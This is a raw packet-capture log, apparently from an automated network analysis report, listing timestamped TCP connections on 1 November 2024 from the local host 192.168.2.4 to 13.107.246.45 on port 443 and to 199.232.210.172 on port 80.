                                                                                                                                                  Nov 1, 2024 10:51:09.711487055 CET49813443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:09.711493015 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.784946918 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                  Nov 1, 2024 10:51:09.790040970 CET8049724199.232.210.172192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:09.790108919 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                  Nov 1, 2024 10:51:10.112729073 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.113173008 CET49809443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.113192081 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.113640070 CET49809443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.113645077 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.115039110 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.115410089 CET49810443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.115420103 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.115828037 CET49810443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.115832090 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.236637115 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.237073898 CET49811443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.237081051 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.237348080 CET49811443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.237351894 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.241910934 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.241957903 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.242007017 CET49809443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.242116928 CET49809443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.242125988 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.242134094 CET49809443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.242140055 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.243448973 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.243508101 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.243546963 CET49810443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.243611097 CET49810443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.243622065 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.243629932 CET49810443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.243635893 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.244658947 CET49814443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.244684935 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.244755983 CET49814443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.244875908 CET49814443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.244889021 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.245209932 CET49815443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.245229959 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.245289087 CET49815443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.245384932 CET49815443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.245395899 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.275450945 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.275826931 CET49812443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.275841951 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.276093006 CET49812443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.276098967 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.365221977 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.365437031 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.365490913 CET49811443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.365521908 CET49811443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.365526915 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.365535975 CET49811443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.365539074 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.367752075 CET49816443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.367795944 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.367860079 CET49816443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.368000984 CET49816443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.368017912 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.407469034 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.407763958 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.407928944 CET49812443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.407928944 CET49812443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.407928944 CET49812443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.409893036 CET49817443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.409923077 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.409985065 CET49817443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.410115004 CET49817443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.410128117 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.454252005 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.454591036 CET49813443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.454602003 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.455099106 CET49813443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.455102921 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.586057901 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.586163998 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.586206913 CET49813443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.586244106 CET49813443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.586251020 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.586262941 CET49813443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.586266994 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.588654041 CET49818443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.588676929 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.588799953 CET49818443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.588979006 CET49818443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.588992119 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.628428936 CET49812443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.628454924 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.970808983 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.971362114 CET49814443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.971390963 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.971703053 CET49814443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.971708059 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.975996971 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.981158018 CET49815443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.981174946 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:10.981652975 CET49815443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:10.981657982 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.100426912 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.100775003 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.100833893 CET49814443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.100871086 CET49814443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.100883961 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.100893974 CET49814443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.100898981 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.103236914 CET49819443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.103265047 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.103354931 CET49819443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.103466034 CET49819443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.103477001 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.107121944 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.107194901 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.107196093 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.107255936 CET49815443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.107327938 CET49815443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.107336998 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.107346058 CET49815443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.107348919 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.107489109 CET49816443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.107506990 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.107937098 CET49816443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.107943058 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.109313965 CET49820443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.109344006 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.109410048 CET49820443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.109519005 CET49820443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.109533072 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.135766029 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.136138916 CET49817443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.136152983 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.136614084 CET49817443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.136617899 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.239003897 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.239196062 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.239248037 CET49816443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.239279032 CET49816443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.239296913 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.239306927 CET49816443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.239316940 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.241085052 CET49821443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.241111994 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.241184950 CET49821443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.241305113 CET49821443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.241316080 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.263958931 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.264174938 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.264229059 CET49817443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.264256001 CET49817443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.264266968 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.264275074 CET49817443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.264280081 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.265882969 CET49822443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.265898943 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.265966892 CET49822443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.266073942 CET49822443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.266083002 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.332144022 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.332453966 CET49818443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.332473993 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.332842112 CET49818443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.332848072 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.464539051 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.465619087 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.465681076 CET49818443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.465723991 CET49818443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.465738058 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.465749979 CET49818443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.465755939 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.468044043 CET49823443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.468060017 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.468132019 CET49823443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.468261957 CET49823443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.468271017 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.833220005 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.845154047 CET49819443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.845175028 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.845707893 CET49819443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.845711946 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.940772057 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.941677094 CET49820443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.941698074 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.941988945 CET49820443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.941993952 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.971224070 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.972124100 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.972197056 CET49819443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.972363949 CET49819443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.972363949 CET49819443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.972376108 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.972383022 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.974620104 CET49824443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.974647999 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.974721909 CET49824443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.974858046 CET49824443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.974872112 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.989178896 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.989572048 CET49821443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.989584923 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.989875078 CET49821443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.989881039 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.991214037 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.991441965 CET49822443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.991451025 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:11.991780996 CET49822443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:11.991785049 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.069628000 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.069752932 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.069900990 CET49820443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.072217941 CET49820443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.072217941 CET49820443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.072225094 CET49825443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.072228909 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.072237015 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.072249889 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.072323084 CET49825443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.072448969 CET49825443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.072460890 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.121084929 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.121157885 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.121176958 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.121282101 CET49822443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.121309042 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.121474981 CET49821443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.121474981 CET49822443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.121474981 CET49822443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.121481895 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.121488094 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.121704102 CET49821443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.121715069 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.121740103 CET49821443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.121742964 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.123704910 CET49826443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.123733044 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.123785019 CET49827443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.123795986 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.123825073 CET49826443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.123857021 CET49827443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.123980999 CET49826443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.123981953 CET49827443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.123990059 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.123996973 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.195940971 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.196352959 CET49823443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.196361065 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.196657896 CET49823443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.196661949 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.326694012 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.326739073 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.326937914 CET49823443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.326988935 CET49823443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.326994896 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.327003002 CET49823443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.327006102 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.329446077 CET49828443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.329482079 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.329732895 CET49828443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.329859018 CET49828443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.329880953 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.707916975 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.708322048 CET49824443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.708336115 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.708781958 CET49824443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.708789110 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.824194908 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.825139999 CET49825443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.825155020 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.825706005 CET49825443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.825711012 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.843645096 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.844594955 CET49827443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.844600916 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.844964981 CET49827443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.844968081 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.849421024 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.850351095 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.850368023 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.850420952 CET49824443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.850420952 CET49826443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.850435019 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.850447893 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.850790977 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.850908995 CET49824443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.850908995 CET49826443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.850935936 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.851356983 CET49824443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.851356983 CET49824443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.851372957 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.851380110 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.862035036 CET49829443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.862062931 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.862193108 CET49829443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.862288952 CET49829443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.862298965 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.953978062 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.954051018 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.954109907 CET49825443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.954323053 CET49825443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.954334974 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.954344988 CET49825443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.954349041 CET4434982513.107.246.45192.168.2.4
